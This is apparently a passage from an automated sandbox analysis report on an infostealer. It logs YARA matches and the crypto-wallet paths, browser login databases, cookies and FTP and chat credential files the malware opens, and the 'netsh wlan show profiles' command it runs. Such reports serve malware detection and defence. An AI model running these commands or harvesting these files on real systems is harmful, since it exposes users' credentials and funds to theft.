Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C5E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00C5E27A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AD6160 LookupAccountNameA, 6_2_00AD6160
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Source: Yara match File source: 11.2.rundll32.exe.6e360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.rundll32.exe.6c8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match File source: 11.2.rundll32.exe.6e360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.rundll32.exe.6c8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.chrosha.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.amert.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorha.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UeW2b6mU6Z.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorha.exe.ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorha.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1662528461.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1631465413.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2896697223.0000000000721000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2419534146.0000000000D01000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2904688254.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2906723727.000000006E361000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2378317595.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2305523548.0000000004730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2906782204.000000006C8B1000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1711152742.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1670942847.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2430115976.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1671668895.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1703275180.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Source: Yara match File source: 00000014.00000002.2888771295.0000000001868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2619416783.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2927751545.0000000008107000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.2871931818.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.2897094573.00000000002E1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.2553727448.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000003.2702706239.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2895798421.0000000000631000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000002.2895930049.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 590971cd60.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5236, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\aMLtP386CmzygUXw7MGrDsU.zip, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\4JKZLoG_AJreMfNRzAg0gnZ.zip, type: DROPPED
Source: 590971cd60.exe, 00000014.00000003.2598707896.0000000007F84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: 590971cd60.exe, 00000014.00000003.2598707896.0000000007F84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet~
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: 590971cd60.exe, 00000014.00000003.2598707896.0000000007F84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet~
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: 590971cd60.exe, 00000014.00000003.2598707896.0000000007F84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets$
Source: 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: powershell.exe, 0000000D.00000002.2449781101.0000017E32F5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: 590971cd60.exe, 00000014.00000002.2894697417.0000000007F00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\ctdHFaOFtzZOUECZpaTYJiPURhhWvconESoaMbLeFCEZNaYeLeGhbWPiOEzlzfBKb\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\ctdHFaOFtzZOUECZpaTYJiPURhhWvconESoaMbLeFCEZNaYeLeGhbWPiOEzlzfBKb\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000055001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\4d0ab15804\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000056001\.purple\accounts.xml
